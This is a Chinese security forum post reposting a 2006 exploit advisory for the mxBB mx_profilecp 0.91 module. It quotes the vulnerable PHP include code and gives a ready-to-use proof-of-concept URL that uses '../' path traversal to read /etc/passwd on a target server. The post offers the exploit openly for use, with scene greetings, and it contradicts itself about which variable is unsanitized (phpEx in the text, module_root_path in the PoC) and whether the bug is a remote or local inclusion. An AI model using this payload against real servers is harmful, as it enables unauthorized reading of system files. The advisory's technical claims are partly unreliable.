‹‹ 上一主题 | 下一主题 ››
发新话题
打印

mxBB Module mx_profilecp 0.91 Remote File Include Vulnerability

pub!1c

团队执行官

Rank: 8Rank: 8

E.S.T核心成员

帖子
3926 
精华
128 
积分
209876 
阅读权限
200 
性别
男 
在线时间
1117 小时 
注册时间
2007-10-23 
最后登录
2008-11-17 

资料收集奖 运营支持奖

楼主 发表于 2006-12-12 09:50  只看该作者

mxBB Module mx_profilecp 0.91 Remote File Include Vulnerability

复制内容到剪贴板
代码:
</p><pre>_____ __ __ __ ___ | __ \ | \/ | \ \ / (_) | | | |_ __ | \ / | __ ___ __ \ \ / / _ _ __ _ _ ___ | | | | '__| | |\/| |/ _` \ \/ / \ \/ / | | '__| | | / __| | |__| | | | | | | (_| |> < \ / | | | | |_| \__ \ |_____/|_| |_| |_|\__,_/_/\_\ \/ |_|_| \__,_|___/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-= mxBB Cpanel Profile Module Local File Inclusion Vulnerablity =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-= Script:mxBB Cpanel Profile Module Version:0.91 Download:[url]http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=70[/url] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-= Author:Dr Max Virus Location:Egypt =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-= Bug in :includes/profilcp_constants.php Vul Code: if ( !file_exists($mx_root_path . 'modules/mx_profilecp/language/lang_' . $board_config['default_lang'] . '/lang_main.'.$phpEx ) ) //{ // include( $mx_root_path . 'modules/mx_profilecp/language/lang_english/lang_main.'.$phpEx ); =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-= Problem:The variable of phpEx is not sanitized =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-= POC: http://[target]/[path]/includes/profilcp_constants.php?module_root_path=[File] http://[target]/[path]/includes/profilcp_constants.php?module_root_path=../../../../../../etc/passwd =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-= Thx to:str0ke & All My Friends Special Gr33ts:AsianEagle & The Master & Kacper =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-= </pre><p>

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题